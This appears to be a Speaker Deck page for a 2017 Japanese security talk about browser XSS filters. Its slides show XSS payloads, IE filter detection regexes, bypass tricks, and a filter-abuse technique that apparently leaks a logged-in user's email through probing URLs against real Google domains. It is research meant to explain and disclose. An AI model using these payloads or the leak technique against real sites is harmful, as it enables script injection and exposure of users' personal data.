Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

Masato Kinugawa
March 31, 2017
Technology
7
3.2k

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。

Masato Kinugawa

March 31, 2017
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
3.4k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
2.1k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
19k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
1
21k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
6.8k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
98k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
25k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
12k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
20k

Other Decks in Technology

See All in Technology
Developers Summit 2025 浅野卓也(13-B-7 LegalOn Technologies)
legalontechnologies
PRO
0
720
管理者しか知らないOutlookの裏側のAIを覗く#AzureTravelers
hirotomotaguchi
2
420
Developer Summit 2025 [14-D-1] Yuki Hattori
yuhattor
19
6.2k
Oracle Cloud Infrastructure:2025年2月度サービス・アップデート
oracle4engineer
PRO
1
210
2025-02-21 ゆるSRE勉強会 Enhancing SRE Using AI
yoshiiryo1
1
360
エンジニアの育成を支える爆速フィードバック文化
sansantech
PRO
3
1.1k
The Future of SEO: The Impact of AI on Search
badams
0
200
運用しているアプリケーションのDBのリプレイスをやってみた
miura55
1
720
SA Night #2 FinatextのSA思想/SA Night #2 Finatext session
satoshiimai
1
140
白金鉱業Meetup Vol.17_あるデータサイエンティストのデータマネジメントとの向き合い方
brainpadpr
6
760
7日間でハッキングをはじめる本をはじめてみませんか?_ITエンジニア本大賞2025
nomizone
2
1.8k
N=1から解き明かす AWS ソリューションアーキテクトの魅力
kiiwami
0
130

Featured

See All Featured
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
59k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
174
51k
Embracing the Ebb and Flow
colly
84
4.6k
The World Runs on Bad Software
bkeepers
PRO
67
11k
The Invisible Side of Design
smashingmag
299
50k
Why Our Code Smells
bkeepers
PRO
336
57k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
45
9.4k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
356
29k
Documentation Writing (for coders)
carmenintech
67
4.6k
Visualization
eitanlees
146
15k
Rebuilding a faster, lazier Slack
samanthasiow
80
8.8k
Done Done
chrislema
182
16k

Transcript

  1. None
  2. None

  3. ❶ ➌ ❷ ❹

  4. None

  5. https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg onload=alert(1)>"> </body> </html>

  6. https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg #nload=alert#1#>"> </body> </html>

  7. https://addons.mozilla.org/ja/firefox/addon/noscript/

  8. HTTP/1.1 200 OK Date: Tue, 28 Mar 2017 06:16:00 GMT

    Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
  9. None
  10. None
  11. None

  12. https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701 <input value=""><svg #nload=alert#1#>"> <input value=""><svg onload=alert(1)>">

  13. None

  14. <input value=""><svg #nload=alert#1#>"> <input value="<svg #nload=alert#1#>"> <!-- <svg #nload=alert(1)> -->

    https://example.com/?q="><svg+onload=alert(1)>

  15. <input value=""><svg onload=alert(1)>"> <input value="<svg onload=alert(1)>"> <!-- <aaa onload=alert(1)> -->

    https://example.com/?q="><svg+onload=alert(1)>

  16. https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701

  17. <title>&lt;script&gt; - Google 検索</title> <script>(function(){window.google={kEI: [...] https://www.google.co.jp/search?q=<script>

  18. <script src=//example.jp/jquery.js></script> <script> if(jQuery){ // Expected }else{ // ??? }

    </script> https://example.com/?<script src=//example.jp/jquery.js></script>
  19. None

  20. {<a.*?hr{e}f} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}} [...] {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&#x?0 *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53) |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&#x?0*((67)|(43)|(99)|(63) );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&#x?0*((82)|(52)|(114)|(72));?))([\t]| (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9

    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {<BUTTON[ /+\t].*?va{l}ue[ /+\t]*=} {<fo{r}m.*?>} {<OPTION[ /+\t].*?va{l}ue[ /+\t]*=} {<INPUT[ /+\t].*?va{l}ue[ /+\t]*=} [...] {<EM{B}ED[ /+\t].*?((src)|(type)).*?=} {[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.} {<ME{T}A[ /+\t].*?((http-equiv)|(charset))[ /+\t]*=} [...] "><svg #nload=alert#1#>

  21. [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. "><svg[SPACE]onload=alert(1)>

  22. "><svg onload=alert(1)> [\"\'][ ]*(([^a-z0- 9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])) )).+?{\(}.*?{\)} x="";alert(1)//"

  23. None

  24. https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf http://d.hatena.ne.jp/teracc/20090622

  25. https://www.slideshare.net/masatokinugawa/xxn-ja

  26. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script> q = "";document#body.innerHTML="<xss>"; </script> URL:

    ?q=";document.body.innerHTML="<xss>

  27. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script src> <script src="//example.co.jp/test.js" type="text/javascript"> </script>

    URL: ?"/++.+++=

  28. "style=:\ javascript:- vbscript:- vbs:- ",x[]= "{toString: "{valueOf:

  29. <script src="//example^co.jp/test.js" type="text/javascript"> </script>

  30. window#name//Syntax Error window^name//Syntax OK <script> window.name

  31. None

  32. url=location.search.slice(1); if(url^indexOf(":")!=-1){ url=null; } onload=function(){ if(url){location=url;} }

  33. https://example.com/?q=";alert`1`// <script> q = "";alert`1`//"; </script> https://www.slideshare.net/x00mario/es6-en/34 ECMAScript 6 from

    an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else

  34. https://example.com/?q=${alert(1)}``//&`+++` https://example.com/?q=[USER_INPUT] <script> foo=``; q="[USER_INPUT]"; </script> <script> foo=`#; q="${alert(1)}#`//"; </script>

  35. https://example.com/?+onfiles+++=. <script src="/comm#nfiles/js/important.js" type="text/javascript"> </script> [...]

  36. https://bugs.chromium.org/p/chromium/issues/detail?id=654794

  37. None

  38. http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html

  39. https://VICTIM/ https://VICTIM/?<xss> IFRAME ERROR https://ATTACKER/ win=window.open(…) if(win.length == 0){ //

    // }else{ // } <script>…</script>

  40.     

  41. https://www.youtube.com/watch?v=IMDWjKFbsJE

  42. HTTP/1.1 200 OK [...] Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options:

    SAMEORIGIN

  43. https://accounts.google.com/ServiceLogin?

  44. google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br

    google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(

  45. ✨ ✨ ✨

  46. {<a.*?hr{e}f}

  47. 0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>

    5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/

  48. 0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>

    5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> <a%XXhref https://example.com/?<a%2Bhref

  49. 0 <ahr#f> 1 <aAhr#f> 2 <aAAhr#f> 3 <aAAAhr#f> 4 <aAAAAhr#f>

    5 <aAAAAAhr#f> 6 <aAAAAAAhr#f> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/?<a%2Bhref

  50. 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_

    A a 0x00 0-9 < B-Z b-z

  51. 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_

    A a 0x00 0-9 < B-Z b-z

  52. <div class="gb_xb">[email protected]</div><div class="gb_pb"> {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

  53. ✔ ✔ ✔ ✔

  54. <div class="gb_xb">[email protected]</div><div class="gb_pb">

  55. https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]=

  56. https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.ru/?"[email protected]=

    https://www.google.ru/?"[email protected]=

  57. https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ca/?"[email protected]= ...

  58. ✨ ✨ ✨

  59. None
  60. None
  61. None
  62. None

  63.   

  64.     

  65.      

  66. None